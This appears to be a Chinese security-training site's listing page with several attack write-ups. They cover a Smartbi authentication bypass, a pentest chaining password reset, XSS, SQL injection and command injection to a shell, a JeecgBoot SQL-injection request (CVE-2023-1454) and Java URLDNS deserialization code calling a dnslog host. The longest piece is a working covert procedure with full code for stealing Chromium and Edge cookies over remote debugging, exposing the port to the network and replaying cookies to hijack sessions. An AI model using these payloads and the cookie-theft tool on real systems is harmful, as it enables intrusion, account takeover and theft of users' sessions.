蚁景网安 - 网络安全人才培养服务提供商

VMPWN的入门级别题目详解（二）

VMPWN的入门级别题目详解（一）

Smartbi 身份认证绕过漏洞

内置账号密码登录因为自己搭建的环境存在一些问题，可能是版本过高的原因，(奇奇怪怪的问题，用户没有权限)，所以目前仅仅做概念性验证，对漏洞的原理进行分析。在未登录的情况下访问接口 /smartbi/vision/RMIServlet 我们可以比较明显的看到对应的处理类 CheckIsLoggedFilter smartbi.freequery.filter.CheckIsLoggedFilter#doFilter 从这里开始可能就是要进行比较详细的分析，首先是判断请求的路径是不是/vision/RMIServlet 是的话进入这个分支，然后判断请求体中是不是有以 windowUnloading 开头的字符串，这个跟另一种绕过方式有关，这里先不做分析接下来依次判断是否有通过 POST 或者 GET 方法来获取参数 className methodName 如果没有的话，就对参数 encode 进行解码，对相关参数进行赋值 ‍ 这里有一个判断，对类和方法进行鉴权操作，如果是 true 就会继续判断是否登录，只需要满足 FilterUtil.needToCheck 返回 false 就可以 smartbi.util.FilterUtil#needToCheck 我们就注意到从数据库登录的操作也是不需要鉴权就可以进行访问的 smartbi.usermanager.UserManagerModule smartbi.usermanager.UserManagerModule#loginFromDB smartbi.usermanager.SecurityServiceImpl#loginFromDB 这里直接比较的是从数据库中查询出的密码，所以我们就可以直接利用内置的账号和 MD5密码登录 admin 也是可以登录成功的为什么不用原本的登录模式登录，首先原本的登录模式登录是不知道对应的账号和密码的其次我们再对原本的登录逻辑进行简单的分析 smartbi.usermanager.UserManagerModule#clickLogin smartbi.usermanager.UserManagerModule#login smartbi.usermanager.SecurityServiceImpl#login 主要的处理登录逻辑在这一部分 smartbi.usermanager.SecurityServiceImpl#loginDB smartbi.usermanager.UserBO#isPasswordValidate 这里在进行比较的时候首先 String passwordInLib = this.user.getPassword(); 是从数据库中查找用户的密码，根据用户的密码开头的第一位字符，来进行处理比较我们已经知道数据库中对应的值是 0a 但是并没有任何一个值对应的 MD5 的值是a 所以正常无法登录内置用户漏洞修复 http://192.168.222.133:18080/smartbi/vision/sysmonitor.jsp 同样的 POC 已经无法利用成功了，我们关注一下修复的代码内容

kernel-pwn之ret2dir利用技巧

从密码重置打到Getshell和其它漏洞打包

前言前几天是准备上点edusrc的分的所以就准备用手上还没刷的Nday继续上分，然后就有了今天这个案例：信息收集之前在挖某体育学院证书的时候就挖到过一个通过修改html文件更改密码修改步骤的漏洞所以就准备测绘一下这个资产继续看看能不能上分挑一个打开：没有背景图了但还是同资产，因为在测试某体育学院的时候是有账户的，所以直接输入那个账户就能进行下一步操作了，但是这个资产无账户，所以我打算去在搜集一下学号之类的学号这块都是一无所获，然后正准备想其它切入点的时候就突然发现这块的要求是输入学号后5位，而学号通常是有规律的，所以就去生成字典FUZZ了一下 Python输出从00000~99999字典的程序为： dictionary = {} for i in range(100000): key = str(i).zfill(5) value = \"Value \" + key dictionary\[key\] = value with open(\'dict.txt\', \'w\') as file: for key, value in dictionary.items(): file.write(key + \'\\n\') 载入字典后还要设置下时间最后成功拿到几个账户 EDUSRC不收爆破类漏洞所以这个学号不能算是漏洞，但最后学号总归是出来了随后直接输入FUZZ出的5位学号把 https://1.test.edu.cn/passworf/find1_html后的find1_html改为find2_html 直接输入我们要重置的密码更改成功后去登录后台：持续浏览功能点寻找突破点：发现一个活动添加点不存在上传点但是存在描述功能，直接构造xss的payload试试： <Script>alert("1)</Script> 存储XSS+1 此处的payload：<Script>alert("1)</Script> 采用大小写绕过随后又发现一个信息上传点：这几块点是透明没开bp，然后就打算开BP看看能不能拿到些什么突破口点击这块的【添加简历信息】下面的标题处的第一个点发现是个信息编辑界面但它这块是跳出个小窗口的所以前面没怎么注意到开了BP抓包时才发现这块点：点击右侧的修改抓包后：发现id值，直接单引号闭合查看：浏览器端：发现执行了sql语句且发现是GET请求：所以把这块的路径拉到浏览器直接访问这样就不用担心防sqlmap表单了，且不用打包数据包更快捷了 Sqlmap成功跑出数据！ Sql注入+1 随后继续到【会员注册】处直接在搜索处单引号闭合：成功执行查询语句 F12调出网络又发现也是GET请求方式，复制请求URL直接查看回显直接sqlmap跑 Sql注入+2 然后点击右上角【管理员】三个字一开始没发现这三个字还能点击，点击后发现到了信息上传点：这块可以上传文件先上传个php试试提示只能上传上面列出的文件类型，正要准备想其它办法绕过的时候突然发现这块允许上传的文件类型中包括pdf，所以直接上传一个pdf-xss试试：成功上传然后浏览器访问试试：但浏览器提示没有文件，然后仔细看了一下文件上传回显：这里的uploadfile/16893293978.pdf的路径是跟在了?value=参数后面的然后这块参数给完后还在后面又跟了个参数：？file=url=uploadfile/16893293978.pdf，再回到请求包中的参数：发现此处的有个&field=url的参数尝试把参数改成1 浏览器回显不存在"1"，所以这块就明了的，参数&field=后面应该接的参数是文件上传后的路径，因为我们这块输入1，不存在1这个文件所以回显NotFound ，明了了这块所以我们那文件试试：放包：成功触发XSS 存储xss+2 但是这块的任务是getshell所以还是继续尝试文件上传修改MIME信息且php5分段绕过但还是提示不能上传，传了图片马但是不能解析这块上传应该是写死了，所以继续找其它突破口，查看参数发现存在"filename" 问题参数啊，迅速添加延时命令试试： `sleep 7` 回显处成功延时：命令执行成功！进一步探测： Curl命令探测ngrok.io 成功回显！命令执行+1，最后相对应的用命令获取shell就行总结整体难度适中只不过这次测试后台功能点有点多需要仔细观察测试，后台的信息收集做好了Getshell难度瞬间就变小了。

CVE-2023-1454注入分析复现

简介 JeecgBoot的代码生成器是一种可以帮助开发者快速构建企业级应用的工具，它可以通过一键生成前后端代码，无需写任何代码，让开发者更多关注业务逻辑。影响版本 Jeecg-Boot<=3.5.1 环境搭建 idea+ 后端源码： https://github.com/jeecgboot/jeecg-boot/archive/refs/tags/v3.5.0.zip前端源码： https://github.com/jeecgboot/jeecgboot-vue3/archive/refs/tags/v3.5.0.zip安装npm，安装nodejs https://nodejs.org/dist/v18.16.1/node-v18.16.1-x64.msi安装yarn npm install -g yarn 下载依赖 yarn install yarn run serve //起服务由于是前后端分离，需要数据库导入表，使用navicat直接导入即可后端服务端搭建，使用idea搭建导入项目，修改数据库配置配置server端npm服务配置好之后直接启动，访问 http://localhost:3100/login搭建成功漏洞复现前后端分离，后端端口8080 ，Payload： {"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}POST /jeecg-boot/jmreport/qurestSql HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Content-Type: application/json Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Length: 128 {"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"} 分析漏洞产生点位于积木报表插件内，查看更新的3.5.1的版本更新更改了72处的文件，其中需要注意db/其他数据库/jeecgboot-sqlserver2019.sql中重写了数据插入的方法 jeecg-boot-base-core/src/main/java/org/jeecg/common/util/SqlInjectionUtil.java中增加了对sql语句的正则这个修复是针对于后端的SQL注入，/sys/duplicate/check 目前最新更新的3.5.1版本似乎依旧没有针对积木报表注入点儿的加固措施,修复时更换jar包目前积木官方的jar包已升级。关注积木5月份的升级日志 http://jimureport.com/doc/log小结 github上有师傅们的脚本，但是如果要批量使用的话建议在修改一下response的内容，仅仅只有操作失败的报错的话会存在大批量的报错。所有自定义的if判断的回显都建议修改一下，如有错误欢迎指出。

Java反序列化：URLDNS的反序列化调试分析

URLDNS链子是Java反序列化分析的第0课，网上也有很多优质的分析文章。笔者作为Java安全初学者，也从0到1调试了一遍，现在给出调试笔记。一. Java反序列化前置知识 Java原生链序列化：利用Java.io.ObjectInputStream对象输出流的writerObject方法实现Serializable接口，将对象转化成字节序列。 Java原生链反序列化：利用Java.io.ObjectOutputStream对象输入流的readObject方法实现将字节序列转化成对象。测试源码如下，此部分源码参考了ol4three师傅的博客： package serialize; import java.io.*; public class deserTest implements Serializable { private int n; public deserTest(int n) { this.n=n; } @Override public String toString() { return "deserTest2 [n=" + n + ", getClass()=" + getClass() + ", hashCode()=" + hashCode() + ", toString()=" + super.toString() + "]"; } // 反序列化 private void readObject(java.io.ObjectInputStream in) throws IOException,ClassNotFoundException{ in.defaultReadObject(); Runtime.getRuntime().exec("calc"); System.out.println("test"); } public static void main(String[] args) { deserTest x = new deserTest(5); operation1.ser(x); operation1.deser(); x.toString(); } } // 实现序列化和反序列化具体细节的类 class operation1{ // 将输出字节流写入文件中进行封存 public static void ser(Object obj) { // 序列化操作，写操作 try { // 首先文件落地object.obj存储输出流，绑定输出流 ObjectOutputStream ooStream = new ObjectOutputStream(new FileOutputStream("object.obj")); // 重定向将输出流字节写入文件 ooStream.writeObject(obj); ooStream.flush(); ooStream.close(); } catch (FileNotFoundException e) { e.printStackTrace(); }catch (IOException e) { // TODO: handle exception e.printStackTrace(); } } public static void deser() { // 反序列化，读取操作 try { // 绑定输入流 ObjectInputStream iiStream = new ObjectInputStream(new FileInputStream("object.obj")); // 反序列化时需要从相关的文件容器中读取输出的字节流 // 读取字节流操作为readObject,所以重写readObject可以执行自定义代码 Object xObject = iiStream.readObject(); iiStream.close(); } catch (IOException e) { // TODO: handle exception e.printStackTrace(); } catch (ClassNotFoundException e) { // TODO Auto-generated catch block e.printStackTrace(); } } } 二. ysoserial环境搭建 IDE就直接用JetBrains的IDEA就行直接拿Java安全payload集成化工具ysoserial进行分析，这里面已经有现成的环境了 https://github.com/frohoff/ysoserial注意配置好相应的JDK和SDK版本：三. URLDNS攻击链影响的版本问题：与JDK版本无关，其攻击链实现依赖于Java内置类，与第三方库无关 URLDNS这条反序列化链只能发起DNS请求，无法进行其他利用，可以作为验证是否有反序列化漏洞的姿势调试分析 Gadget Chain： Deserializer.deserialize() -> HashMap.readObject() -> HashMap.putVal() -> HashMap.hash() ->URL.hashCode() -> getHostAddress() 在getHostAddress函数中进行域名解析，从而可以被DNSLog平台捕获 URLDNS程序入口在ysoserial-master\src\main\java\ysoserial\payloads\URLDNS.java路径下有URLDNS.java文件 main主函数的run函数打断点进入这个ysoserial-master的payload运行结构大致是有一个专门的PayloadRunner运行程序，然后统一调用来运行各部分的payload 首先是进行序列化：继续往下，生成command，由于是分析URLDNS攻击链，所以只需要修改将返回值为dnslog的临时地址创建实例后，进入到URLDNS的getObject的payload函数 getObject函数中应该注意的是：声明了HashMap对象和URL对象，并进行put哈希绑定，最后设置作用域反序列化链子：在反序列化入口处打断点：在反序列化时调用了readObject函数然后进入HashMap.java的readObject函数在readObject中调试到此行，了putval，在此处IDEA这个IDE可以选择进入的函数，直接进入后者hash 由于我们读入字节序列，需要将其恢复成相应的对象结构，那么就需要重新putval 传入的key不为空，执行key.hashCode 进一步在URL.java文件下进入URLStreamHandler的hashCode 产生解析：总的来说，利用链思路如下：在反序列化URLDNS对象时，也需要反序列化HashMap对象，从而调用了HashMap.readObject()的重写函数，重写函数中调用了哈希表putval等的相关重构函数，在hashcode下调用了getHostAddress函数那么反之，为什么首次声明的时候没有调用到了getHostAddress函数，现在给出声明时的函数路线： ht.put() --> .. --> SilentURLStreamHandler.getHostAddress() 该函数为空实现列出几个路线上的关键函数看看：由于此处key为String类型，则进入String.hashCode 相比之下，在反序列化中key为URL类型设置了不发起dns解析具体执行流，可以看下时序图，我就不讲了^^ 四. URLDNS链的使用 import java.io.*; import java.lang.reflect.Field; import java.net.InetAddress; import java.net.URL; import java.net.URLConnection; import java.net.URLStreamHandler; import java.util.HashMap; public class Main{ // 序列化前不发生dns解析 static class SilentURLStreamHandler extends URLStreamHandler{ protected URLConnection openConnection(URL n) throws IOException{ return null; } protected synchronized InetAddress getHostAddress(URL n) { return null; } } public static void main(String[] args) throws Exception{ HashMap hashMap = new HashMap(); // 设置put时不发起dns解析 URLStreamHandler handler = new Main.SilentURLStreamHandler(); URL url = new URL(null, "http://jloqk8.dnslog.cn", handler); // 利用Java反射机制在动态执行时获取类 Class clazz = Class.forName("java.net.URL"); Field f = clazz.getDeclaredField("hashCode"); f.setAccessible(true); hashMap.put(url, "123"); f.set(url, -1); // 对象输出流绑定文件输出流 ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("out.bin")); oos.writeObject(hashMap); // 序列化 // 对象输入流绑定文件输入流 ObjectInputStream ois = new ObjectInputStream(new FileInputStream("out.bin")); ois.readObject(); // 反序列化 } }

利用远程调试获取Chromium内核浏览器Cookie

前言本文将介绍不依靠DPAPI的方式获取Chromium内核浏览器Cookie 远程调试首先我们以edge为例。edge浏览器是基于Chromium的，而Chromium是可以开启远程调试的，开启远程调试的官方文档如下： https://blog.chromium.org/2011/05/remote-debugging-with-chrome-developer.htmlchrome.exe --remote-debugging-port=9222 --user-data-dir=remote-profile 那么开启远程调试以后可以做什么呢，继续看官方文档： https://chromedevtools.github.io/devtools-protocol/tot/Storage/上述官方文档是Chrome开发者工具协议文档，里面提到如果需要实施调试、分析Chrome需要开启其远程调试：并且告知开启后还提供了json等接口和各种API的使用：既然edge是基于Chromium的，那么edge应该也是可以开启远程调试的。尝试使用Chrome开启远程调试的命令开启edge的远程调试： "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 经测试是可以的，但是前提是必须没有msedge进程在启动着，否则上述命令虽然会启动edge进程，但是并不会开启远程调试端口。停止命令： Get-Process msedge | Stop-Process 获取Cookie 首先看Chrome开发者工具协议能否获取浏览器密码啥的，文档没有：也是，大家平常F12调出开发者工具，也是没有获取浏览器密码方式的。继续搜下Cookie，可以看到有个Network.getAllCookies，但是文档中提到已经弃用了，改用了Storage.getCookies: 那尝试使用Storage.getCookies是否可以获取Cookie呢。开启远程调试后，获取websocket地址：然后尝试使用python的websocket-client模块发送接收数据时，发现提示403: 根据提示看起来是CORS的问题，且给出了解决方案： --remote-allow-origins=* 添加以后发送如下数据包就可以成功获取Cookie： {"id": 1, "method": "Storage.getCookies"} 为了方便远程访问其websocket接口，可以把远程调试端口映射出来： netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=48333 connectaddress=127.0.0.1 connectport=9222 这样就可以远程访问目标的远程调试端口：编写代码 Github有个自动开启远程调试端口和获取Cookie的仓库： https://github.com/defaultnamehere/cookie_crimes/blob/master/cookie_crimes.py其中代码有几个问题，其一没解决CORS的问题，其二使用了可能弃用的Network.getAllCookies，其三开启远程调试端口可以不用依赖python，可以使用cmd命令，最终修改的代码如下： import json import requests import websocket GET_ALL_COOKIES_REQUEST = json.dumps({"id": 1, "method": "Storage.getCookies"}) def hit_that_secret_json_path_like_its_1997(): response = requests.get("http://10.211.55.8:48333/json") websocket_url = response.json()[0].get("webSocketDebuggerUrl") return websocket_url def gimme_those_cookies(ws_url): ws = websocket.create_connection(ws_url) ws.send(GET_ALL_COOKIES_REQUEST) result = ws.recv() ws.close() response = json.loads(result) cookies = response["result"]["cookies"] return cookies ws_url = hit_that_secret_json_path_like_its_1997() print(ws_url) cookies = gimme_those_cookies(ws_url) print(cookies) 这样就可以达到在目标机器上开启远程调试端口并获取Cookie。为了防止开启的浏览器被用户发现，可以使用无头参数-headless，但是存在一个缺点，后面再讲。且为了防止/json接口返回空的情况，建议让浏览器启动时打开一个网站，因此最终完整命令如下： # 关闭edge Get-Process msedge | Stop-Process # 启动远程调试 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.baidu.com --remote-debugging-port=9222 --remote-allow-origins=* -headless # 把远程调试端口映射出来 netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=48333 connectaddress=127.0.0.1 connectport=9222 # 访问json接口获取websocket地址并获取Cookie # 关闭端口映射 netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=48333 实操使用上述命令启动edge：获取Cookie，发现只能获取到www.baidu.com的Cookie：这就是上面提到的，使用无头参数-headless存在的一个缺点，只能获取到打开的网站的Cookie。因此如果想要获取指定目标网站的Cookie，要么重复上面的动作，要么取消无头参数-headless。笔者建议取消-headless参数，打开的浏览器用户也能正常使用，因此建议使用的命令如下： # 关闭edge Get-Process msedge | Stop-Process # 启动远程调试 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.baidu.com --remote-debugging-port=9222 --remote-allow-origins=* # 把远程调试端口映射出来 netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=48333 connectaddress=127.0.0.1 connectport=9222 # 访问json接口获取websocket地址并获取Cookie # 关闭端口映射 netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=48333 获取到上述数据以后，如何使用呢，笔者提供如下代码，来完成满足Cookie格式要求的拼接： def to_cookie_dict(data): if 'www.chinabaiker.com' in data['domain']: cookie_dict = {data['name']: data['value'], 'Domain': data['domain'], 'Path': data['path'], 'Expires': data['expires']} print(cookie_dict) return cookie_dict data_list = [{}] cookie_dict_list = [to_cookie_dict(data) for data in data_list] # 遍历多个cookie字典，将每个字典中的key和value格式化为key=value的字符串 cookie_str_list = [] for cookie_dict in cookie_dict_list: try: for k, v in cookie_dict.items(): cookie_str_list.append('{}={}'.format(k, v)) except Exception as e: print(e) pass # 使用;将多个key=value字符串连接在一起 cookie_str = ';'.join(cookie_str_list) print(cookie_str) 因为获取到的Cookie比较多，在代码最开始做了个简单的过滤： if 'www.chinabaiker.com' in data['domain']: 最终实现的效果如下：首先网站是非登录状态：执行上述代码，获取Cookie：然后放到burpsuite自动替换，笔者的替换规则如下：最终成功完成Cookie的替换登录目标系统： Chrome浏览器同理，就不花篇幅讲了： "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.baidu.com --remote-debugging-port=9222 --remote-allow-origins=* 总结本文介绍了不依靠DPAPI的方式获取Chromium内核浏览器Cookie，可以尽可能的减少被拦截的情况下去获取浏览器Cookie。

Frida主动调用java函数来爆破解题思路

Kernel-Pwn-FGKASLR保护绕过

第2页第3页第4页第5页第6页第7页第8页第9页第10页第11页第12页第13页第14页第15页第16页第17页第18页第19页第20页第21页第22页第23页第24页第25页第26页第27页第28页第29页第30页第31页第32页第33页第34页第35页第36页第37页第38页第39页第40页第41页第42页第43页第44页第45页第46页第47页第48页第49页第50页第51页第52页第53页第54页第55页第56页第57页第58页第59页第60页第61页